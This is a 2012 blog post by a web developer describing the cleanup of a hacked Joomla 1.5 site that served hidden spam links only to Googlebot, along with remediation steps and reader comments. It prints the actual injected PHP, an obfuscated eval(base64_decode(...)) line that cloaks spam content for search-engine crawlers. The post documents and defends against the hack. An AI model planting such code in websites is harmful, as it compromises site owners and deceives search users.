Googlebot fetching spam links in Joomla 1.5

July 06, 2012
JNH Solutions

This code injection puts a heap of spam links on a Joomla website that is only visible to Googlebots. Site obscured for clients protection.

Had a strange task last night that I thought warranted a post as it may help other site owners.

I have a client that I set up a site almost 4 years ago that now has warnings about potential Malware. The client let their web hosting company know about the potential security breech and they suspended the account.

What the real issue was: A hacker was able to insert some malicious code into the Joomla 1.5.12 sites template.

<?php @eval(base64_decode(“aWYgKEBwcmVnX21hdGNoICgiL1tHZ11bT29dW09 vXVtHZ11bTGxdW0VlXXxbTGxdW0lpXVtWdl1bRWVdfFtNbV1bU3NdW0 5uXXxbWXldW0FhXVtIaF1bT29dW09vXXxbQWFdW1NzXVtLa118W0Fh XVtPb11bTGxdfFtCYl1bT29dW1R0XS8iLCRfU0VSVkVSWyJIVFRQX1VTR VJfQUdFTlQiXSkpIHsNCglpZiAoQGlzX2ZpbGUoIi4vdG1wL2xpc3QudHh0 IikpIHsNCgkJQGluY2x1ZGUgIi4vdG1wL2xpc3QudHh0IjsNCgl9DQp9DQo=”)); ?>

Here is a handy resource for anyone that has a eval(base64 php code injection: Redleg’s PHP base64 Decode

The hacker then removed this code, but the damage was done as it was able to insert code just before the on page components begin. How do I know this? The hacker was nice enough to make a backup of the templates index.php file.

So, how do I see what Google sees? You can use their tools in Google Webmaster or (I found this one better) Redleg’s File Viewer and select Googlebot for option 3.

Now, this is where it gets messy. There is no quick fix for this problem. Here is a similar post that I found helpful, but what I did was copy all the files offsite via FTP.

I then used a handy little program called Win Grep to search through all of the files for any *.php files that contained the word “base64”. In my case, it was a quick fix but getting to the solution took a full night of googling “googlebot viagra hack” etc. It is quite a common problem in older versions of Joomla with little help on the subject.

With Win Grep I was able to locate two files that had been modified on the same day with the word “eval” in them. Replacing those two files were the fix, the database was untouched.

The two files in this situation were:

  • /libraries/joomla/application/component/view.php
  • /libraries/joomla/application/component/controller.php

Hope this helps someone else and remember to upgrade your version of Joomla and change all your admin passwords.

Facebook Twitter Linkedin Plusone Pinterest Delicious Reddit Stumbleupon Tumblr Email

2 Comments. Leave new

One thing that you can also check is the “libraries” folder in joomla. I had some files infected in that and it might be a good idea to replace it entirely with one from joomla’s fresh install.

Reply
JNH Solutions
October 29, 2012 1:05 pm

Good advice Neel, starting there might save you with hours of wasted searching 😉

Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

14 − thirteen =

Help-Desk